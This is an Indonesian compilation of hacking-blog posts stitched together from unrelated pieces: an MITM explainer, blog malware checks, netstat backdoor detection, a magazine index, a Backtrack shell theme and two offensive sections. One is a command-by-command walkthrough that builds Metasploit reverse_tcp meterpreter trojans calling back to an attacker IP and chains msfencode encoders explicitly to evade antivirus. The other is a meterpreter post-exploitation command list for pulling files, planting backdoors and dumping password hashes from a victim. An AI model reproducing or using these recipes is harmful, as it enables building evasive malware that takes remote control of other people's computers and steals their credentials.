Mengenal Serangan Man-in-The-Middle (MITM)

Sudah banyak artikel di ilmuhacking yang membahas teknik serangan man in the middle (mitm), namun belum pernah saya menjelaskan secara detil tentang apa itu mitm attack. Mitm attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat. Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.

Bukan Sekedar Sniffing

Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.

Gambar di bawah ini adalah skenario yang bisa dilakukan attacker dengan serangan mitm.

mitm scenario: sniffing,intercepting,tampering,fabricating

sniffing,intercepting,tampering,fabricating

Pada gambar tersebut terlihat ada 4 macam serangan yang bisa dilakukan dengan MITM. Berikut adalah penjelasan dari jenis serangan tersebut dalam skenario seperti gambar di atas.

  • Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.
  • Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira Alice masih berkomunikasi dengannya.
  • Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie.
  • Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice.

Dengan cara mitm ini bisa dibayangkan betapa besar potensi kerusakan yang bisa dilakukan Charlie kepada Alice dan Bob.

Proses Terjadinya Serangan Man-in-The-Middle

Dalam serangan mitm, seorang attacker akan berada di tengah-tengah komunikasi antara dua pihak. Seluruh pembicaraan yang terjadi di antara mereka harus melalui attacker dulu di tengah. Attacker dengan leluasa melakukan penyadapan, pencegatan, pengubahan bahkan memalsukan komunikasi seperti yang sudah saya jelaskan sebelumnya.

Sekarang mari kita lihat proses terjadinya MITM dalam contoh kasus Alice berkomunikasi dengan Bob. Charlie sebagai attacker akan berusaha berada di tengah antara Alice dan Bob. Agar Charlie berhasil menjadi orang ditengah, maka Charlie harus:

  • menyamar sebagai Bob dihadapan Alice
  • menyamar sebagai Alice dihadapan Bob
Charlie acts as fake Bob and fake Alice

Charlie acts as fake Bob and fake Alice

Dalam mitm, Alice mengira sedang berbicara dengan Bob, padahal dia sedang berbicara dengan Charlie. Begitu juga Bob, dia mengira sedang berbicara dengan Alice, padahal sebenarnya dia sedang berbicara dengan Alice. Jadi agar bisa menjadi orang di tengah Charlie harus bisa menyamar di dua sisi, tidak bisa hanya di satu sisi saja.

Kenapa Alice dan Bob bisa terjebak dan tertipu oleh Charlie? Itu karena Alice dan Bob tidak melakukan otentikasi dulu sebelum berkomunikasi. Otentikasi akan menjamin Alice berbicara dengan Bob yang asli, bukan Bob palsu yang diperankan oleh Charlie. Begitu juga dengan otentikasi, Bob akan berbicara dengan Alice yang asli, bukan Alice palsu yang diperankan oleh Charlie.

Pentingnya Otentikasi: Who Are You Speaking With?

Otentikasi adalah proses untuk membuktikan identitas suatu subjek, bisa orang atau mesin. Proses membuktikan identitas seeorang ada banyak cara, namun semuanya bisa dikelompokkan dalam 3 kategori:

  • What you know: PIN, password, pasangan kunci publik-privat
  • What you have: smart card, kunci, USB dongle
  • What you are: fingerprint, retina

Secara singkat otentikasi menjawab pertanyaan “Who are you speaking with?”. Pertanyaan itu sangat penting diketahui sebelum dua pihak berkomunikasi. Bila dua pihak berkomunikasi tanpa sebelumnya melakukan otentikasi, maka keduanya bisa terjebak berbicara dengan orang yang salah, yaitu orang yang menyamar menjadi lawan bicaranya. Bila sampai ini terjadi maka akibatnya bisa sangat fatal, salah satunya adalah terjadinya mitm attack.

Bila dua orang yang sudah saling mengenal berbicara dengan tatap muka langsung, maka tidak mungkin keduanya terjebak dan tertipu berbicara dengan orang yang salah. Otentikasi menjadi sangat penting bila kedua pihak berbicara melalui media komunikasi jarak jauh seperti telpon atau internet. Dalam komunikasi jarak jauh, kita hanya bisa mendengar suara lawan bicara kita, jadi sangat besar kemungkinan kita berbicara dengan orang yang salah.

Jadi cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah mitm. Mari kita lihat kembali contoh Alice,  Bob dan Charlie, bila otentikasi hanya dilakukan oleh Bob, sedangkan Alice tidak. Karena tidak adanya otentikasi Alice, maka Charlie bisa menyamar sebagai Alice di hadapan Bob, namun Charlie tidak bisa menyamar sebagai Bob di hadapan Alice. Kenapa Charlie tidak bisa menyamar menjadi Bob? Sebab Alice akan menguji keaslian Bob dengan otentikasi, sehingga penyamaran Charlie sebagai Bob palsu akan terbongkar dan Alice tidak akan mau melanjutkan komunikasi.

Cara Mengetahui Malware Pada Blog

Mengetahui Malware Pada BlogBlog yang disusupi malware sangat berbahaya bagi pembaca yang mengunjunginya. Karena dengan malware yang berada di blog tersebut, bisa saja malware yang berada dalam sebuah blog yang kita kunjungi berbalik menyerang komputer yang sedang kita gunakan untuk mengakses sebuah blog yang terkena malware. Akibatnya, komputer kita menjadi bermasalah dan tidak mampu lagi melakukan fungsi kerja secara maksimal.

Malware merupakan sebuah program jahat yang digunakan untuk mendeteksi kelemahan sebuah software atau sistem operasi tertentu. Ketika sebuah blog terkena malware maka sebenarnya blog tersebut sedang diteliti di mana celah kelemahannya. Selain itu, malware juga melakukan aktivitas tertentu yang berbahaya lainnya seperti mengirimkan pesan informasi tertentu mengenai blog kita tanpa sepengetahuan kita sebagai admin.

Sumber penyebab munculnya malware pada blog kita sebagian besar berasal dari penggunaan script yang bermasalah. Pada kondisi tertentu, script tersebut sudah mengandung malware sebelumnya. Sehingga, ketika kita memasang script tersebut di blog kita untuk menampilkan widget tertentu maka secara otomatis malware dalam script tersebut akan menyebar ke dalam blog kita.

Jika blog kita sudah terkena malware maka Google akan memberikan peringat kepada para pengunjung kita jika blog kita tersebut terjangkit malware dan direkomendasikan berbahaya untuk dikunjungi. Adapun gambar peringatan tersebut adalah seperti berikut ini.



Dengan adanya peringatan berbahaya ini tentu akan merusak kredibilitas blog kita yang selama ini baik di hadapan para pembaca setia kita. Situs kita akan kehilangan kepercayaan dan kehilangan pembacanya.

Untuk itu, ada baiknya kita melakukan upaya pencegahan malware mulai dari langkah pemeriksaan apakah blog kita sudah terkena malware atau belum. Langkah untuk mengetahui malware pada blog kita antara lain sebagai berikut:

Pertama kunjungi Google Webmasters Tools.

Setelah masuk, ada tampilan blog yang kita miliki dengan akun tersebut. Klik URL blog yang kita miliki tersebut.

Setelah masuk dasbor, perhatikan bagian diagnostik.


Klik malware/program jahat.

Jika blog kita masih bersih dari malware maka akan muncul pernyataan dari Google seperti Google belum mendeteksi malware apa pun pada situs ini atau Google has not detected any malware on this site. Akan tetapi, jika blog kita sudah disusupi oleh malware maka Google akan memberikan peringatan kepada kita jika blog kita tersebut sudah tersusupi oleh malware.

Malware memang berbahaya dan meresahkan bagi pengunjung blog kita. Salah satu bentuk ketidaknyamanan pengunjung adalah mereka mulai menjadi ragu dengan kredibilitas blog kita yang disusupi malware tersebut. Oleh karena itu, tindakan pencegahan berupa pengecekan berkala cukup penting dilakukan akan blog kita terjamin keamanannya dari segala ancaman buruk yang mungkin belum pernah kita duga dan antisipasi sebelumnya. dan saya berusaha menjauhkan Malware seperti itu dalam situs ini :)

Mendeteksi Backdoor "Basic"

Cara manual untuk mendeteksi backdoor adalah melihat port yang terkoneksi dan port yang sedang menunggu koneksi dari luar. Berikut ini langkah-langkah untuk mendeteksi trojan backdoor.

  • Tutup semua program, terutama yang berhubungan dengan koneksi jaringan.
  • Buka dialog Run dengan menggunakan kombinasi tombol Window+R. Isi dengan "CMD"
  • Muncul jendela CMD dan ketikkan "netstat-aon"
  • Hasil perintah netstat akan terlihat sebagai berikut:

C:\Documents and Settinga\Administrayor>netstat -aon

Active Connections

Proto Local Addresss
Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 944
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP
127.0.0.1:1028
0.0.0.0:0
LISTENING
1312
TCP
127.0.0.1:1135
127.0.0.1:3460
SYN.SENT
2328
TCP
192.168.244.131:139
0.0.0.0:0

4
UDP
0.0.0.0:445
*:*

392
UDP
0.0.0.0:500
*:*

1084
UDP
0.0.0.0:1039
*:*

692
UDP
127.0.0.1:123
*:*

1036
UDP
127.0.0.1:1900
*:*

1152
UDP
192.168.244.131:123
*:*

1036
UDP
192.168.244.131:137
*:*

4
UDP
192.168.244.131:138
*:*

4
UDP
192.168.244.131:1900
*:*

1152
C:\Documents and Settings\Administrator>

Seperti yang ada di lajur ke empat pada kolom ketiga terdapat isi yang berbeda dari baris lainnya. Pada kolom inilah perhatian akan lebih difokuskan.

Transmission Control Protocol atau TCP merupakan bagian protocol yang digunakan untuk mengirim data. Kolom kedua berisi alamat komputer, sedangkan kolom ketiga berisi alamat tujuan packet akan dikirimkan. Dalam kasus ini, contoh tersebut memperlihatkan alamat local 127.0.0.1.  Dalam kasus nyata, kolom ini berisi alamat DNS, misalnya yang dibuat melalui NO.IP.com. Sementara, kolom keempat berisi SYN_SENT yang berarti ada program yang sedang menunggu jawaban dari respon luar. Hal ini menandakan server belum terkoneksi ke client. Jika server telah terkoneksi ke client, kolom ini berisi tulisan ESTABLISHED.

Kolom terakhir berisi PID dari proses program yang sedang menjalankan rutin koneksi ini. Untuk melihat proses program apakah itu, Anda dapat menggunakan Task Manager.

Mengingat begitu berbahayanya malware yang satu ini, selain mendeteksinya dengan cara manual, Anda pun juga bisa menggunakan antivirus andal untuk membersihkan komputer Anda yang terinfeksi malware ini terutama oleh Poison Ivy.

Sumber: CHIP

[ENCODING] Membuat Trojan Dengan Metasploit Extension

Kali ini saya akan memberikan sedikit pengarahan untuk membuat payload trojan dengan msfpayload lalu meng-encoding-nya dengan msfencode.

Preparation:
1. msfpayload



2. msfencode



Note: Dengan menginstall Metasploit, berarti kamu telah memiliki kedua requirements di atas.

Walkthrough:

Kali ini saya akan membuat payload trojan untuk melakukan interaksi dengan metasploit milik saya. IP address saya 10.21.0.232, dan Metasploit saya melakukan listening trojan pada port 4444.Buka terminal, lalu masukan perintah:root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 X > /tmp/trojan1.exe

Keterangan:
Trojan diatas berfungsi untuk:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File di beri nama trojan1.exe pada direktori /tmp/


Ini adalah payload standar tanpa encoding, dan sangat mudah dikenali antivirus sebagai virus trojan. Untuk itu, kita akan melakukan encoding virus dengan bantuan msfencode.

Buka terminal lagi, lalu masukan perintah:

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/trojan2.exe



Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
5. msfencode melakukan encoding dengan format ektensi .exe
6. File di beri nama trojan2.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -t exe > /tmp/trojan3.exe



Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. msfencode melakukan encoding dengan format ektensi .exe
8. File di beri nama trojan3.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -t exe > /tmp/trojan3.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode melakukan encoding dengan format ektensi .exe
9. File di beri nama trojan3.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t exe > /tmp/trojan4.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode melakukan encoding dengan format ektensi .exe
10. File di beri nama trojan4.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -t exe > /tmp/trojan6.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload  dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. msfencode melakukan encoding dengan format ektensi .exe
12. File di beri nama trojan6.exe pada direktori /tmp/

Jika masih terdeteksi virus, mungkin metode ini bisa melewati antivirus. Buka terminal, lalu masukan perintah.

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -c 8 -v -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t exe > /tmp/trojan7.exe


Keterangan:
1. Membuka sesi meterpreter.
2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 10.21.0.232 dan mendengarkan pada port 4444
3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)
4. msfencode melakukan encoding payload dengan arsitektur x86 (32 bit)
5. msfencode melakukan encoding payload dengan menghindari shell code \x00\xff saat melakukan generating shell code.
6. msfencode melakukan encoding payload dengan x86/shikata_ga_nai
7. x86/shikata_ga_nai melakukan encoding payload sebanyak 8 kali
8. msfencode meingkatkan verbose level
9. msfencode menyimpan payload  dalam format RAW
10. msfencode melakukan encoding kembali dengan encoder x86/call4_dword_xor
11. x86/call4_dword_xor melakukan encoding sebanyak 2 kali
12 x86/call4_dword_xor menyimpan payload dalam format RAW
13. msfencode melakukan encoding dengan encoder x86/jmp_call_additive
14. x86/jmp_call_additive melakukan encoding payload sebanyak 2 kali
15. msfencode melakukan encoding dengan format ektensi .exe
16. File di beri nama trojan4.exe pada direktori /tmp/

Sampai sejauh ini, virus-virus jahat kita sudah bersembunyi dengan baik di balik amplop yang dibuat pada encoder. Dan jika masih terseteksi, kamu bisa menggunakan encoder lain, mengkombinasikan encoder, meningkatkan banyaknya encoding yang dilakukan, atau memilih payload lain.

Created by:
red-dragon

Supported by:
Blue Dragon

Loced By:
Yoshephine Handini

EcHo|Zine vol 10 issue 25 public release

__________       ______  __       __________________               
___  ____/__________  / / /______ ____  /___  /___(_)_______ _____ 
__  __/   _  ___/__  /_/ / _  __ \___  / __  / __  / __  __ \_  _ \
_  /___   / /__  _  __  /  / /_/ /__  /  _  /___  /  _  / / //  __/
/_____/   \___/  /_/ /_/   \____/ _  /   /____//_/   /_/ /_/ \___/ 
                                  /_/

-----[ Silver Release

Di rilis yang 25 ini, dibuka dengan sebuah artikel pseudorandom [002.txt] yang
membahas mengenai pergerakan Anonymous dan pengharapan ke negeri ini,
dilanjutkan dengan sebuah prophile dari d.m0nk3y [003.txt].  Pada issue kali
ini kami membawa kembali rubrik Interview Komunitas [004.txt], dimulai dengan
usulan interview dari Nyit-nyit.net (N3), sebuah komunitas yang khusus
mendikusikan seputar game, dan sudah sejak lama berdiri) sampai menjadi sebuah
interview yang sangat menarik, khususnya bagi penikmat game hacking/cracking
ditanah air. 

Artikel selanjutnya adalah artikel pertama dari rampuriezt yang membahas
mengenai Radio Frequency Identification (RFID) [005.txt], implementasi dan
keamanannya.  Dilanjutkan dengan Rubrik "Hacker Log Book" kali ini di isi
d.m0nk3y dengan sebuah bahasan mengenai beberapa jenis serangan terhadap IP
Camera [006.txt], selanjutnya adalah artikel kedua dari rampuriezt yang
berjudul "Secure Fax dengan PGP dan QRCode"[007.txt].

Kemudian di ranah mobile security terdapat sebuah artikel yang membahas
instalasi PwnPhone ke Nokia N900 oleh Budi Khoirudin[008.txt], dilanjutkan
dengan sebuah artikel yang membahas backdooring di ring0 untuk linux kernel
2.6.38, yaitu dengan memanfaatkan System Call (Syscall) oleh dextone dan
stnmrshx [009.txt]. Artikel ke 10 yang berjudul "Wireless: Channel Jamming"
[010.txt] dari lirva32 memberikan Proof of concept terkait aktifitas jamming
yang membanjiri channel dengan paket data dan jumlah koneksi berlebih.

dan issue kali ini ditutup dengan rubrik "Newcomer Series" yang kali ini
membahas mengenai GSM Network dan sedikit mengenai OPENBTS [011.txt]. Kedua
rubrik tersebut di tulis oleh d.m0nk3y. 
---| echo|zine issue #25 ( 27-04-2012 ) 

01. Introduction .................................................. y3dips
02. Pseudo-random ................................................. y3dips 
03. Prophile on d.m0nk3y ........................................... az001
04. Interview : Nyit-Nyit.Net (N3) Community ....................... az001
05. Introduction to Radio Frequency Identification (RFID)...... rampuriezt
06. Hacker Log Book: Attacking IP Camera 4 lulz  ................ d.m0nk3y
07. Secure Fax dengan PGP dan QRCode .......................... rampuriezt
08. Mobile Pentesting Suite : Nokia N900 PwnPhone ......... budi khoirudin
09. ROOTKIT: Renyah, Enak, dan Gurih .................. dextone & stnmrshx
10. Wireless : Channel Jamming ................................... lirva32
11. NewComer Series: Introduction to GSM Network and OpenBTS .... d.m0nk3y
 
Enjoy! 

Perintah Dasar Meterpreter Pada Backtrack

Quote:Assalamualaikum Wr. Wb.

Yang Terhormat Penikmat Google, Yang Terhormat Administrator Google, Yang Terhormat Moderator Goolge, Yang Terhormat Costumer-Service, Yang Terhormat Trainess Dan Seluruh Manusia yang menganggap dirinya manusia ... wkkwkkw.

Ini Bukan Tulisan Saya dan saya mendapatnya dari Forum IndonesianBacktrack!
Tapi Mudah Mudahan Bermanfaat

Buat yang sering menggunkan Metasploit pasti sudah sering menggunakan beberapa perintah dibawah ini ketika sudah mendapatkan meterpreter, jadi buat yang ingin mendalami Metasploit, ini adalah wajib untuk dipelajari,termasuk ane,hoho..

1. help
Perintah ' help ' akan menampilkan menu help pada terminal.

2. background
Perintah ' background ' mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

3. ps
Perintah ' ps ' digunakan untuk menampilkan proses yang sedang berjalan.

4. migate
Perintah ' migrate ' digunakan untuk berpindah pada proses yang lain.

5. ls
Perintah ' ls ' digunakan untuk menampilkan daftar file dari sebuah folder tempat kita berada.

6. download
Perintah ' download ' adalah untuk mendownload file dari komputer korban, dan gunakan double-slashes ( \\ )untuk menetapkan direktori.

7. upload
Perintah ' upload ' adalah untuk mengupload file kedalam komputer korban(biasanya backdoor), dan gunakan double-slashes.

8. ipconfig
Perintah ' ipconfig ' untuk menampilkan kartu jaringan/network interfaces dan alamat korban.

9. getuid
Perintah ' getuid ' adalah untuk menampilkan hostname dari komputer korban.

10. execute
Perintah ' execute ' adalah untuk menjalankan aplikasi para komputer korban.

11. shell
Perintah ' shell ' adalah perintah untuk mendapatkan shell dari komputer korban(biasanya command Prompt windows).

12. idletime
Perintah ' idletime ' adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

13. hasdump
Perintah ' hashdump ' untuk menampilkan data dari SAM file.

14. ?
Perintah ' ? ' adalah untuk menampilkan help dari meterpreter.

15. channel
Perintah ' channel ' untuk menampilkan channel yang sedang aktif.

16. close
Perintah ' close ' untuk keluar dari channel.

17. exit
Perintah ' exit ' untuk keluar dari session yang sedang aktif.

18. interact
Perintah ' interact ' untuk interaksi dengan channel.

19. irb
Perintah ' irb ' untuk menjalankan ruby shell command.

20. quit
Perintah ' quit ' kembali kepada terminal meterpreter dan keluar dari session yang aktif.

21. read
Perintah ' read ' membaca data dari channel.

22. run
Perintah ' run ' untuk dapat menjalankan script meterpreter.

23. write
Perintah ' write ' digunakan untuk menulis kedalam channel.

24. cat
Perintah ' cat ' digunakan untuk membaca sebuah file.


Sebenernya Masih Banyak Perintah-Perintah Lainya.

Semoga Bermanfaat!

Merubah tampilan konsole/terminal di Backtrack

Settingan untuk mengubah terminal berada pada directory home anda yang bernama .bashrc akan tetapi terhidden (tanda titik berada pada file). langsung aja buka terminal (jadi root), trus ikuti langkah-langkah berikut.

1. install figlet

root@bt:~# apt-get install figlet

2. install cowsay

root@bt:~#apt-get install cowsay

3. ketik

root@bt:~# gedit .bashrc

masukkan script berikut dibagian paling bawah.

#!/bin/bash
#——————————————////
# Bash Fryme Joe
# Last Modified 11 Jul 2012 by @trixie
# Running on Backtrack 5
#——————————————////
#——————————————////
# Colors:
#——————————————////
black=’\e[0;30m'
blue='\e[0;34m'
green='\e[0;32m'
cyan='\e[0;36m'
red='\e[0;31m'
purple='\e[0;35m'
brown='\e[0;33m'
lightgray='\e[0;37m'
darkgray='\e[1;30m'
lightblue='\e[1;34m'
lightgreen='\e[1;32m'
lightcyan='\e[1;36m'
lightred='\e[1;31m'
lightpurple='\e[1;35m'
yellow='\e[1;33m'
white='\e[1;37m'
nc='\e[0m'

#password login
#{
#echo -n "Fryme Joe : "
#read trixie
#if [ "$trixie" == "pwnsauce" ] ; then
#echo “login is complete!”
#echo -e “${red}by trixie67″
#else
#reboot
#fi
#}

# Mod Terminal
cowsay -f eyes “Fu can change the world !”

#Figlet nama
figlet “Indonesia Backtrack Team”

# system informasi

echo -ne “${lightblue}”; echo “=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=”
echo -ne “${lightgreen}Today is:\t\t${red}” `date`; echo “”
echo -e “${lightgreen}Kernel Information: \t${red}” `uname -smr`
echo -e “${lightgreen}Time: \t\t\t${red}” `date +%r`
echo -e “${lightgreen}Date: \t\t\t${red}” `date +”%d-%m-%Y”`
echo -e “${lightgreen}User: \t \t \t${red}” `whoami`
echo -ne “${lightgreen}$HOSTNAME ${lightgreen}uptime is: ${red} \t \t “;uptime | awk /’up/ {print $3,$4,$5,$6,$7,$8,$9,$10}’
#List network
echo -ne “${lightgreen}Ip address: \t \t ${red}” ;lynx -dump -hiddenlinks=ignore -nolist http://checkip.dyndns.org:8245/ | grep “Current IP Address” | cut -d”:” -f2 | cut -d” ” -f2
echo “”
echo -e “${lightgreen}Indonesian Backtrack Team”
echo -ne “${white}${italic}the quieter you become, the more you able to hear”
echo -e “\t \t ${cyan}@${white}k${lightgreen}y${white}o${red}s${yellow}h${green}i${blue}r${purple}o${lightred}6${lightgray}7″
echo -ne “${lightblue}” ; echo “=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=”

4. save.

note: fiture password pada script diatas tidak saya aktifkan. untuk mengaktifkan tinggal hilangkan tanda pagar pada bagian

#password login
#{
#echo -n “Fryme Joe : “
#read trixie
#if [ "$trixie" == "pwnsauce" ] ; then
#echo “login is complete!”
#echo -e “${red}by trixie67″
#else
#reboot
#fi
#}

menjadi

#password login
{
echo -n “Fryme Joe : “
read trixie
if [ "$trixie" == "pwnsauce" ] ; then
echo “login is complete!”
echo -e “${red}by trixie67″
else
reboot
fi
}

Untuk list lengkapnya tema terminal saya bisa anda lihat dibawah ini

# ~/.bashrc: executed by bash(1) for non-login shells.

#!/bin/bash
#——————————————////
# Bash Fryme Joe
# Last Modified 11 Jul 2012 by @trixie67
# Running on Backtrack 4
#——————————————////
#——————————————////
# Colors:
#——————————————////
black=’\e[0;30m'
blue='\e[0;34m'
green='\e[0;32m'
cyan='\e[0;36m'
red='\e[0;31m'
purple='\e[0;35m'
brown='\e[0;33m'
lightgray='\e[0;37m'
darkgray='\e[1;30m'
lightblue='\e[1;34m'
lightgreen='\e[1;32m'
lightcyan='\e[1;36m'
lightred='\e[1;31m'
lightpurple='\e[1;35m'
yellow='\e[1;33m'
white='\e[1;37m'
nc='\e[0m'

# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

# don’t put duplicate lines in the history. See bash(1) for more options
#export HISTCONTROL=ignoredups

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval “$(lesspipe)”

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" -a -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we “want” color)
case “$TERM” in
xterm-color)
#PS1=’${debian_chroot:+($debian_chroot)}\[33[01;32m\]\u@\h\[33[00m\]:\[33[01;34m\]\w\[33[00m\]\$ ‘
;;
*)
PS1=’${debian_chroot:+($debian_chroot)}\u@\h:\w\$ ‘
;;
esac

# Comment in the above and uncomment this below for a color prompt
PS1=’${debian_chroot:+($debian_chroot)}\[33[01;32m\]\u@\h\[33[00m\]:\[33[01;34m\]\w\[33[00m\]\$ ‘

# If this is an xterm set the title to user@host:dir
case “$TERM” in
xterm*|rxvt*)
PROMPT_COMMAND=’echo -ne “33]0;${USER}@${HOSTNAME}: ${PWD/$HOME/~}07″‘
;;
*)
;;
esac

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

#if [ -f ~/.bash_aliases ]; then
# . ~/.bash_aliases
#fi

# enable color support of ls and also add handy aliases
if [ "$TERM" != "dumb" ]; then
eval “`dircolors -b`”
alias ls=’ls –color=auto’
#alias dir=’ls –color=auto –format=vertical’
#alias vdir=’ls –color=auto –format=long’
fi

# some more ls aliases
#alias ll=’ls -l’
#alias la=’ls -A’
#alias l=’ls -CF’

# enable programmable completion features (you don’t need to enable
# this, if it’s already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
#if [ -f /etc/bash_completion ]; then
# . /etc/bash_completion
#fi
export PATH=$PATH:/opt/oracle/instantclient_10_2
export SQLPATH=/opt/oracle/instantclient_10_2
export TNS_ADMIN=/opt/oracle/instantclient_10_2
export LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2
export ORACLE_HOME=/opt/oracle/instantclient_10_2

#password login
{
echo -n “Fryme Joe : “
read trixie
if [ "$trixie" == "pwnsauce" ] ; then
echo “login is complete!”
echo -e “${red}by trixie67″
else
reboot
fi
}

# Mod Terminal
cowsay -f eyes “Fu can change the world !”

#Figlet nama
figlet “Indonesia Backtrack Team”

# system informasi

echo -ne “${lightblue}”; echo “=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=”
echo -ne “${lightgreen}Today is:\t\t${red}” `date`; echo “”
echo -e “${lightgreen}Kernel Information: \t${red}” `uname -smr`
echo -e “${lightgreen}Time: \t\t\t${red}” `date +%r`
